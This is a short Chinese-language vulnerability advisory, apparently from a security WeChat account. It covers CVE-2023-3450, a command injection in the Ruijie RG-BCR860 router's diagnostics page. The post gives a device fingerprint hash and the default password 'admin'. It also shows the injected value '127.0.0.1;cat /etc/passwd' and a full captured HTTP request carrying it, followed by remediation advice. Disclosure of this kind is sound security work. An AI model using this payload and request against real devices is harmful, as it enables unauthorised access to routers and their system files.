关注我们❤️,添加星标?,一起学安全!
作者:lyc@Timeline Sec
本文字数:786
阅读时长:1~3min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介
北京星网锐捷网络技术有限公司,行业领先的ICT基础设施及行业解决方案提供商,主营业务为网络设备、网络安全产品及云桌面解决方案的研发、设计和销售。Ruijie Networks RG-BCR860是该公司的一款商业云路由器。
0x02 漏洞概述
漏洞编号:CVE-2023-3450
Ruijie RG-BCR860 2.5.13版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入。
0x03 影响版本
Ruijie RG-BCR860 2.5.13 版本
0x04 环境搭建
非开源产品,无法搭建。
指纹特征:icon_hash="-399311436"
0x05 漏洞复现
该漏洞属于后台漏洞,需要输入默认密码admin进入后台
点击最下角的”网络诊断“,在”Tracert检测“的”地址“框中,输入127.0.0.1;cat /etc/passwd,接着点 击”开始检测“,运行输入的命令,发现在检测框中回显了执行的命令。
抓取命令执行的数据包如下:
GET /cgi-bin/luci/;stok=eec2b12d06840b05a31fe74e08bcdda2/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=3 HTTP/1.1
Host: xx.xx.xx.xx:xxxx
User-Agent : Mozilla/5 .0 (Windows NT 10 .0 ; Win64 ; x64 ; rv:109 .0) Gecko/20100101 Firefox/115 .0
Accept : */*
Accept-Language : zh-CN ,zh;q=0 .8 ,zh-TW;q=0 .7 ,zh-HK;q=0 .5 ,en-US;q=0 .3 ,en;q=0 .2 Accept-Encoding : gzip , deflate
X-Requested-With : XMLHttpRequest
Connection : close
Referer : http://xx.xx.xxx.xxx:xxxx/cgi-
bin/luci/;stok=aec2b12d06840c05a31fe74e08bcdda2/admin/diagnosis
Cookie : sysauth=42c707ae8cf9ac550c4d24d7f8b92f76
命令执行成功回显截图
0x06 修复方式
目前厂商已发布升级补丁以修复漏洞,该漏洞由于正常功能过滤不严格导致存在命令注入,并且需要高权 限账号登录操作,建议修改登录密码为强口令,通过白名单控制访问原地址。
参考链接
https://www.wevul.com/1928.html
推荐服务
历史漏洞
暂无
后台功能
回复【1】领取新人学习资料
回复【2】进入漏洞查询功能
回复【3】获取加群方式
回复【4】领取安全电子书籍
回复【5】进入SRC-QQ交流群
商务合作
原文始发于微信公众号(Timeline Sec):CVE-2023-3450:Ruijie RG-BCR860 后台命令执行漏洞
